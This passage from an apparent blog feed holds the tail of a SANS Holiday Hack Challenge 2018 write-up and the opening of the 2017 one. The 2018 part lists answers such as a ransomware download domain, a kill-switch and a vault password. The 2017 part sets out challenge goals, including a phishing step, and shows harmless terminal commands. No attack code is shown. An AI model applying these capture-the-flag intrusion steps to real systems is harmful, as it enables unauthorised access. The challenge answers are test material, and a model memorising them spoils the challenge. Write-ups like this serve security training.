&lt;p&gt;The success message is &lt;code&gt;[+] Congratulation! Snort is alerting on all
ransomware and only the ransomware!&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;After completing the prior question, Alabaster gives you a document he
suspects downloads the malware. What is the domain name the malware in the
document downloads from?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The domain name is &lt;code&gt;erohetfanu.com&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="11"&gt;
&lt;li&gt;Analyze the full malware source code to find a kill-switch and activate it
at the North Pole's domain registrar &lt;a class="reference external" href="https://hohohodaddy.kringlecastle.com/index.html"&gt;HoHoHo Daddy&lt;/a&gt;. What is the full
sentence text that appears on the domain registration success message
(bottom sentence)?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The sentence is &lt;code&gt;Successfully registered yippeekiyaa.aaay!&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="12"&gt;
&lt;li&gt;After activating the kill-switch domain in the last question, Alabaster
gives you a &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/forensic_artifacts.zip"&gt;zip file&lt;/a&gt;
with a memory dump and encrypted password database. Use these files to
decrypt Alabaster's password database. What is the password entered in the
database for the Vault entry?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The password in the database is &lt;code&gt;ED#ED#EED#EF#G#F#G#ABA#BA#B&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="13"&gt;
&lt;li&gt;Use what you have learned from previous challenges to open the &lt;a class="reference external" href="https://pianolockn.kringlecastle.com/"&gt;door to
Santa's vault&lt;/a&gt;. What message do
you get when you unlock the door?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The message is &lt;code&gt;You have unlocked Santa's vault!&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="14"&gt;
&lt;li&gt;Who was the mastermind behind the whole KringleCon plan?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The mastermind was Santa all along!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id48"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Whew! Well, this sure was challenging. For some of these questions, I think I
was too focused on one possible answer, and when I saw it wasn't the correct
one, I felt out of ideas. For example, I shouldn't have missed the hex encoding
of the file names in the ransomware source code, but I was distracted by the
unsafe randomness!&lt;/p&gt;
&lt;p&gt;Which brings the question, is &lt;code&gt;Get-Random&lt;/code&gt; actually cryptographically
safe is used without a seed? This seems to contradicts what I've found during
my research, but I don't have the answer 🤷‍♂️.&lt;/p&gt;
&lt;p&gt;Our next question is, what does &lt;code&gt;erohetfanu&lt;/code&gt; (the domain used for the
ransomware DNS server) mean? I asked one of my anagram-enthusiast friend what
it could mean, and he gave me the following answers:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Four ethane&lt;/li&gt;
&lt;li&gt;A fun hetero &lt;em&gt;(I like this one)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Ah fourteen&lt;/li&gt;
&lt;li&gt;Unearth foe&lt;/li&gt;
&lt;li&gt;Fear the UNO &lt;em&gt;(Hmmm, what?)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;One fur heat&lt;/li&gt;
&lt;li&gt;Eat, fun hero &lt;em&gt;(Also like this one)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;A foe hunter &lt;em&gt;(Probably this one, though)&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And finally &lt;a class="reference external" href="https://nerdist.com/die-hard-christmas-movie/"&gt;does this really qualify as a **Christmas** challenge&lt;/a&gt;? 😉&lt;/p&gt;
&lt;p&gt;Once again, congratulations to the SANS team for a well executed challenge. I
enjoyed the fact that it allowed people to use real-world professional tools
and techniques (like &lt;code&gt;BloodHound&lt;/code&gt;, and Kerberoast). I also really liked
the malware analysis portion, even if I was a litle bit frustrated with myself!
It's not something that we usually do in our day-to-day work and I enjoyed the
exercise.&lt;/p&gt;
&lt;p&gt;See you next year!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="appendix-chocolate-chip-cookie-recipe"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id49"&gt;Appendix: Chocolate Chip Cookie Recipe&lt;/a&gt;&lt;/h2&gt;
&lt;img alt="chocolate_chip_cookie_recipe.jpg" class="align-center" src="/images/sans-christmas-challenge-2018/chocolate_chip_cookie_recipe.jpg" /&gt;
&lt;p&gt;&lt;strong&gt;PREHEAT&lt;/strong&gt;&amp;nbsp;oven to 375° F.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;COMBINE&lt;/strong&gt;&amp;nbsp;flour, baking soda and salt in small bowl. Beat butter, granulated
sugar, brown sugar and vanilla extract in large mixer bowl until creamy. Add
eggs, one at a time, beating well after each addition. Gradually beat in flour
mixture. Stir in morsels and nuts. Drop by rounded tablespoon onto ungreased
baking sheets.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BAKE&lt;/strong&gt;&amp;nbsp;for 9 to 11 minutes or until golden brown. Cool on baking sheets for
2 minutes; remove to wire racks to cool completely.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PAN COOKIE VARIATION:&lt;/strong&gt;&amp;nbsp;Preheat oven to 350° F. Grease 15 x 10-inch
jelly-roll pan. Prepare dough as above. Spread into prepared pan. Bake for 20
to 25 minutes or until golden brown. Cool in pan on wire rack. Makes 4 dozen
bars.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SLICE AND BAKE COOKIE VARIATION: PREPARE&lt;/strong&gt;&amp;nbsp;dough as above. Divide in half;
wrap in waxed paper. Refrigerate for 1 hour or until firm. Shape each half into
15-inch log; wrap in wax paper.  Refrigerate for 30 minutes.* Preheat oven to
375° F. Cut into 1/2-inch-thick slices; place on ungreased baking sheets. Bake
for 8 to 10 minutes or until golden brown. Cool on baking sheets for 2 minutes;
remove to wire racks to cool completely. Makes about 5 dozen cookies.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;* May be stored in refrigerator for up to 1 week or in freezer for up to 8
weeks.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FOR HIGH ALTITUDE BAKING (5,200 feet):&lt;/strong&gt;&amp;nbsp;Increase flour to 2 1/2 cups. Add 2
teaspoons water with flour and reduce both granulated sugar and brown sugar to
2/3 cup&amp;nbsp;each. Bake drop cookies for 8 to 10 minutes and pan cookie for 17 to 19
minutes.&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2017</title><link href="https://allyourbase.utouch.fr/posts/2018/01/10/sans-christmas-challenge-2017/" rel="alternate"></link><published>2018-01-10T00:00:00+01:00</published><updated>2018-01-10T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2018-01-10:/posts/2018/01/10/sans-christmas-challenge-2017/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2017_logo.png" class="align-center" src="/images/sans-christmas-challenge-2017/sans_christmas_challenge_2017_logo.png" /&gt;
&lt;p&gt;'Tis the season to be pwning, falalalala lalalala. As usual, here's my write-up
for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2017/"&gt;2017 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id16"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#first-page-of-the-great-book" id="id17"&gt;First page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-winter-wonder-landing" id="id18"&gt;North Pole and Beyond: Winter Wonder Landing&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cranberry-pi-yannick-s-dirty-solution" id="id19"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cranberry-pi-the-official-solution" id="id20"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#redirecting-the-snowball" id="id21"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#second-page-of-the-great-book" id="id22"&gt;Second …&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2017_logo.png" class="align-center" src="/images/sans-christmas-challenge-2017/sans_christmas_challenge_2017_logo.png" /&gt;
&lt;p&gt;'Tis the season to be pwning, falalalala lalalala. As usual, here's my write-up
for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2017/"&gt;2017 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id16"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#first-page-of-the-great-book" id="id17"&gt;First page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-winter-wonder-landing" id="id18"&gt;North Pole and Beyond: Winter Wonder Landing&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cranberry-pi-yannick-s-dirty-solution" id="id19"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cranberry-pi-the-official-solution" id="id20"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#redirecting-the-snowball" id="id21"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#second-page-of-the-great-book" id="id22"&gt;Second page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-winconceivable-the-cliffs-of-winsanity" id="id23"&gt;North Pole and Beyond: Winconceivable: The Cliffs of Winsanity&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id1" id="id24"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id2" id="id25"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id3" id="id26"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-letters-to-santa-application" id="id27"&gt;North Pole Christmas Town infrastructure: Letters to Santa application&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#third-page-of-the-great-book" id="id28"&gt;Third page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-cryokinetic-magic" id="id29"&gt;North Pole and Beyond: Cryokinetic Magic&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id4" id="id30"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id5" id="id31"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id6" id="id32"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-smb-server" id="id33"&gt;North Pole Christmas Town infrastructure: SMB server&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fourth-page-of-the-great-book" id="id34"&gt;Fourth page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-there-s-snow-place-like-home" id="id35"&gt;North Pole and Beyond: There's Snow Place Like Home&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cranberry-pi" id="id36"&gt;Cranberry Pi&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id7" id="id37"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-elf-web-access" id="id38"&gt;North Pole Christmas Town infrastructure: Elf Web Access&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fifth-page-of-the-great-book" id="id39"&gt;Fifth page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-bumbles-bounce" id="id40"&gt;North Pole and Beyond: Bumbles Bounce&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id8" id="id41"&gt;Cranberry Pi&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id9" id="id42"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-north-pole-police-department-web-site" id="id43"&gt;North Pole Christmas Town infrastructure: North Pole Police Department web site&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sixth-page-of-the-great-book" id="id44"&gt;Sixth page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-i-don-t-think-we-re-in-kansas-anymore" id="id45"&gt;North Pole and Beyond: I don't think we're in Kansas anymore&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id10" id="id46"&gt;Cranberry Pi&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id11" id="id47"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-elf-as-a-service-platform" id="id48"&gt;North Pole Christmas Town infrastructure: Elf as a Service platform&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#seventh-page-of-the-great-book" id="id49"&gt;Seventh page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-oh-wait-maybe-we-are" id="id50"&gt;North Pole and Beyond: Oh wait! Maybe we are...&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id12" id="id51"&gt;Cranberry Pi&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id13" id="id52"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-elf-machine-interface-server" id="id53"&gt;North Pole Christmas Town infrastructure: Elf-Machine Interface server&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#who-is-behind-all-this" id="id54"&gt;Who is behind all this?&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-and-beyond-we-re-off-to-see-the" id="id55"&gt;North Pole and Beyond: We're Off To See The...&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id14" id="id56"&gt;Cranberry Pi&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id15" id="id57"&gt;Redirecting the snowball&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#north-pole-christmas-town-infrastructure-elf-database" id="id58"&gt;North Pole Christmas Town infrastructure: Elf Database&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answers-to-the-questions" id="id59"&gt;Answers to the questions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id60"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id16"&gt;Introduction&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We're greeted by Sam the Snowman, who exposes the situation to us. The North
Pole is under siege, attacked by giant falling snowballs, and an
Inter-Dimensional Tornado, that shredded &lt;em&gt;The Great Book&lt;/em&gt;. This book tells the
epic story of the elves. Our mission is to redirect the falling snowballs,
find out who is behind all this, and recover the missing seven pages of &lt;em&gt;The
Great Book&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Here are the questions we must answer:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;cite&gt;Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;Elf Web Access (EWA. is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at least six insider threat moles?  Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;The North Pole engineering team has introduced an Elf as a Service (EaaS.  platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI. to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?&lt;/cite&gt;&lt;/li&gt;
&lt;li&gt;&lt;cite&gt;Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This challenge is divided into two targets:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The North Pole Christmas Town infrastructure, which includes the Letters To
Santa application, and the internal 10.142.0.0/24 network.&lt;/li&gt;
&lt;li&gt;The &lt;a class="reference external" href="https://2017.holidayhackchallenge.com/"&gt;North Pole and Beyond&lt;/a&gt;, where
we have to redirect falling snowballs. These levels also have Cranberry Pi
terminal with challenges to solve. Solving these challenges gives us objects
to redirect the falling snowballs, and hints to the exploitation of the North
Pole Christmas Town infrastructure. Hints are also available for the
Cranberry Pi terminal challenges, on the Twitter accounts of the different
elves.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now I know that hints can be helpful, but it's more fun to try and figure out
how to solve the different challenges our own way. So:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;We won't use the Twitter profiles to solve the Cranberry Pi challenges.&lt;/li&gt;
&lt;li&gt;I'll post the solutions to the Cranberry Pi challenges, but we won't use the
hints that are given after solving.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As usual, I'll try to detail my thought process as much as possible, including
dead-ends and mistakes (that's the best way to learn).&lt;/p&gt;
&lt;p&gt;Sounds good? Great (plus, you don't really have a say)!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="first-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id17"&gt;First page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="north-pole-and-beyond-winter-wonder-landing"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id18"&gt;North Pole and Beyond: Winter Wonder Landing&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The first page is available in the North Pole and Beyond, in the level &lt;strong&gt;Winter
Wonder Landing&lt;/strong&gt;. We must use the giant falling snowball to get the first page.
But let's first solve the Cranberry Pi challenge.&lt;/p&gt;
&lt;div class="section" id="cranberry-pi-yannick-s-dirty-solution"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id19"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                                 |
                               \ ' /
                             -- (*) --
                                &amp;gt;*&amp;lt;
                               &amp;gt;0&amp;lt;&amp;#64;&amp;lt;
                              &amp;gt;&amp;gt;&amp;gt;&amp;#64;&amp;lt;&amp;lt;*
                             &amp;gt;&amp;#64;&amp;gt;*&amp;lt;0&amp;lt;&amp;lt;&amp;lt;
                            &amp;gt;*&amp;gt;&amp;gt;&amp;#64;&amp;lt;&amp;lt;&amp;lt;&amp;#64;&amp;lt;&amp;lt;
                           &amp;gt;&amp;#64;&amp;gt;&amp;gt;0&amp;lt;&amp;lt;&amp;lt;*&amp;lt;&amp;lt;&amp;#64;&amp;lt;
                          &amp;gt;*&amp;gt;&amp;gt;0&amp;lt;&amp;lt;&amp;#64;&amp;lt;&amp;lt;&amp;lt;&amp;#64;&amp;lt;&amp;lt;&amp;lt;
                         &amp;gt;&amp;#64;&amp;gt;&amp;gt;*&amp;lt;&amp;lt;&amp;#64;&amp;lt;&amp;gt;*&amp;lt;&amp;lt;0&amp;lt;*&amp;lt;
           \*/          &amp;gt;0&amp;gt;&amp;gt;*&amp;lt;&amp;lt;&amp;#64;&amp;lt;&amp;gt;0&amp;gt;&amp;lt;&amp;lt;*&amp;lt;&amp;#64;&amp;lt;&amp;lt;
       ___\\U//___     &amp;gt;*&amp;gt;&amp;gt;&amp;#64;&amp;gt;&amp;lt;0&amp;lt;&amp;lt;*&amp;gt;&amp;gt;&amp;#64;&amp;gt;&amp;lt;*&amp;lt;0&amp;lt;&amp;lt;
       |\\ | | \\|    &amp;gt;&amp;#64;&amp;gt;&amp;gt;0&amp;lt;*&amp;lt;0&amp;gt;&amp;gt;&amp;#64;&amp;lt;&amp;lt;0&amp;lt;&amp;lt;&amp;lt;*&amp;lt;&amp;#64;&amp;lt;&amp;lt;
       | \\| | _(UU)_ &amp;gt;((*))_&amp;gt;0&amp;gt;&amp;lt;*&amp;lt;0&amp;gt;&amp;lt;&amp;#64;&amp;lt;&amp;lt;&amp;lt;0&amp;lt;*&amp;lt;
       |\ \| || / //||.*.*.*.|&amp;gt;&amp;gt;&amp;#64;&amp;lt;&amp;lt;*&amp;lt;&amp;lt;&amp;#64;&amp;gt;&amp;gt;&amp;lt;0&amp;lt;&amp;lt;&amp;lt;
       |\\_|_|&amp;amp;&amp;amp;_// ||*.*.*.*|_\\db//_
       &amp;quot;&amp;quot;&amp;quot;&amp;quot;|'.'.'.|~~|.*.*.*|     ____|_
           |'.'.'.|   ^^^^^^|____|&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;|
           ~~~~~~~~         '&amp;quot;&amp;quot;&amp;quot;&amp;quot;`------'
My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?
Find and run the elftalkd binary to complete this challenge.
elf&amp;#64;3b92caa92835:~$
&lt;/pre&gt;
&lt;p&gt;Ok, so we just have to find the &lt;code&gt;elftalkd&lt;/code&gt; binary and launch it, easy
enough:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2849ef63a77a:~$&lt;/span&gt; find / -name elftalkd
&lt;span class="go"&gt;bash: /usr/local/bin/find: cannot execute binary file: Exec format error&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, &lt;code&gt;find&lt;/code&gt; doesn't work, dammit. We can try to execute a
&lt;code&gt;ls -lR /&lt;/code&gt;, however this does not give us the full path to the listed
files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2849ef63a77a:/$&lt;/span&gt; ls -lR /
&lt;span class="go"&gt;/:&lt;/span&gt;
&lt;span class="go"&gt;total 64&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Nov 14 13:49 bin&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Apr 12  2016 boot&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   5 root   root     360 Dec 23 16:17 dev&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   1 root   root    4096 Dec 23 16:17 etc&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   1 root   root    4096 Dec  4 14:32 home&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   8 root   root    4096 Sep 13  2015 lib&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Nov 14 13:49 lib64&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Nov 14 13:48 media&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Nov 14 13:48 mnt&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Nov 14 13:48 opt&lt;/span&gt;
&lt;span class="go"&gt;dr-xr-xr-x 292 nobody nogroup    0 Dec 23 16:17 proc&lt;/span&gt;
&lt;span class="go"&gt;drwx------   2 root   root    4096 Nov 14 13:49 root&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   1 root   root    4096 Dec  4 14:32 run&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   1 root   root    4096 Nov 17 21:59 sbin&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   2 root   root    4096 Nov 14 13:48 srv&lt;/span&gt;
&lt;span class="go"&gt;dr-xr-xr-x  13 nobody nogroup    0 Dec 21 14:03 sys&lt;/span&gt;
&lt;span class="go"&gt;drwxrwxrwt   1 root   root    4096 Dec  4 14:32 tmp&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   1 root   root    4096 Nov 14 13:48 usr&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x   1 root   root    4096 Nov 14 13:49 var&lt;/span&gt;
&lt;span class="go"&gt;/bin:&lt;/span&gt;
&lt;span class="go"&gt;total 7364&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root 1037528 May 16  2017 bash&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 cat&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   60272 Mar  2  2017 chgrp&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   56112 Mar  2  2017 chmod&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   64368 Mar  2  2017 chown&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root  151024 Mar  2  2017 cp&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;/var/opt:&lt;/span&gt;
&lt;span class="go"&gt;total 0&lt;/span&gt;
&lt;span class="go"&gt;/var/spool:&lt;/span&gt;
